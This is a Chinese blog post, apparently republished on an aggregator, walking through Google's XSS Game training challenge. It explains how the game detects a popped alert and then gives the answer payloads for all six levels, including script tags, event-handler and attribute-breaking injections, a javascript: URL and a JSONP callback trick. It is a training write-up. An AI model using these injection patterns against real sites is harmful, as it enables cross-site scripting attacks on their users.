有意思的游戏:Google XSS Game
来源:互联网 发布:php 上传文件进度 编辑:程序博客网 时间:2024/05/29 11:56
Google最近出了一个XSS的游戏:
https://xss-game.appspot.com/
我这个菜鸟看提示,花了两三个小时才全过了。。
这个游戏的规则是只要在攻击网页上弹出alert窗口就可以了。
题目页面是在iframe里嵌套的展现的,那么父窗口是如何知道iframe里成功弹出了窗口?
是这样子实现的:
题目页面加载了这个js,改写了alert函数,当alert被调用时,向parent发送一个消息。
https://xss-game.appspot.com/static/game-frame.js
/* If we're being iframed, let the parent know our URL *//* Kids: don't do this at home! */parent.postMessage(window.location.toString(), "*");/* Override window.alert */var originalAlert = window.alert;window.alert = function(s) { parent.postMessage("success", "*"); setTimeout(function() { originalAlert("Congratulations, you executed an alert:\n\n" + s + "\n\nYou can now advance to the next level."); }, 50);}然后父窗口注册了一个EventListener来接收这个消息:
https://xss-game.appspot.com/static/game.js
window.addEventListener("message", function(event) { if (!window.location.origin) { window.location.origin = window.location.protocol + "//" + window.location.hostname + (window.location.port ? ':' + window.location.port: ''); } if (event.origin == window.location.origin && event.data == "success") { userOpenedAlert = true; levelSolved(); return; }
最下面是题目的答案。如果想自己玩游戏的,慎拉下。
题目的答案:
Level1:
<script>alert(1)</script>
Level2:
<input onmouseover="alert(1)">
Level3:
https://xss-game.appspot.com/level3/frame#3.jpg' onload="alert(1)">
Level4:
3');alert('1
Level5:
https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert(1)
Level6:
重点是前面要有一个空格。
https://www.google.com/jsapi?callback=alert
游戏过关之后,google给出了一个xss的文档:
https://www.google.com/about/appsecurity/learning/xss/index.html
- 有意思的游戏:Google XSS Game
- Google的XSS游戏
- Google最新XSS Game Writeup
- google的xss游戏,过时,蛋疼自己记录
- 有意思的google空间
- Google XSS Game Level 01-06
- 几个有意思的游戏
- google中有意思的事情
- Ratproxy -- Google 的 XSS 检测工具
- 一个有意思的“远程反射”XSS(其实是SSRF)
- 牛逼的google,太有意思了~~~~~~
- 一道有意思的Google面试题
- Bloxorz很有意思的一个游戏(POJ3322)
- 一款有意思的flash音乐游戏
- Google有意思的一个小工具Google Sets
- 有意思的Google Reader新应用,Google Reader Play
- 基于cocos2dx,在android的游戏中加入google play game排行榜。
- Google域名解析的游戏?
- 14
- Protocol Buffer Basics: Java
- codeforce 6A
- 15
- POJ 2299 - Ultra-QuickSort
- 有意思的游戏:Google XSS Game
- 16
- 对非正确使用浮点型数据而导致项目BUG的问题探讨
- linux编程合并多个静态库.a为一个.a
- DATAGUARD 估算业务高峰redo传送网络的带宽
- JQuery日期插件datepicker的使用
- 17
- HDU1102_Constructing Roads(最小生成树)
- ubuntu 14.04 安装chrome及给chromium 安装 flash player